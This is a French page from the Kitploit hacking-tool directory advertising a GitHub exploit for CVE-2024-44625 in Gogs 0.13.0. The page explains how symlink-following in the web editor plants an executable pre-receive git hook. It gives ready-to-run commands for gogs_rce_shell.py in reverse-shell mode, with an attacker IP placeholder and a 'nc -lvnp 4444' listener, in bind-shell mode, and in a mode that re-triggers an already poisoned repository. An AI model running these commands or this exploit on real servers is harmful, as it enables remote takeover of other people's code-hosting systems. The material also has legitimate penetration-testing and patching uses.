Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-44625-Gogs-RCE-0.13.0 — Exploit pour CVE-2024-44625 dans Gogs 0.13.0, permettant l'exécution de code à distance via le suivi de lien symbolique pour créer un hook git, avec des modes shell inverse et shell lié. | Kitploit
Outils/GitHubGitHub/batj44/cve-2024-44625-gogs-rce-0.13.0
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubbatj44/cve-2024-44625-gogs-rce-0.13.0

CVE-2024-44625-Gogs-RCE-0.13.0

Exploit pour CVE-2024-44625 dans Gogs 0.13.0, permettant l'exécution de code à distance via le suivi de lien symbolique pour créer un hook git, avec des modes shell inverse et shell lié.

Voir le dépôt
il y a 1 jourPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-44625 & Gogs-RCE-0.13.0

Validé contre un Gogs de l'ère 0.13.0 derrière un proxy inverse. Primitive : le suivi de lien symbolique de l'éditeur web vers un fichier .git/hooks/pre-receive ABSENT crée ce fichier (exécutable). Chaque push ultérieur vers le dépôt l'exécute.

Utilisation :

Reverse shell (lancer d'abord le listener : nc -lvnp 4444)

root@kitploit:~
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
    --mode reverse --lhost <YOUR_IP> --lport 4444

Bind shell (puis se connecter : nc )

root@kitploit:~
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
    --mode bind --bind-port 5555

Ré-déclencher un hook existant (dépôt déjà empoisonné) sans le replanter :

root@kitploit:~
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
    --mode reverse --lhost IP --lport 4444 --repo <name> --reuse --triggers 3

Notes :

  • Le dépôt est un NOUVEAU dépôt jetable créé sous --owner (par défaut --user).
  • Le chemin du hook est dérivé de --root (par défaut /data/git/gogs-repositories, Docker).
  • exit 0 maintient les pushs normaux (pas d'erreur « hook declined »).
Télécharger l’outil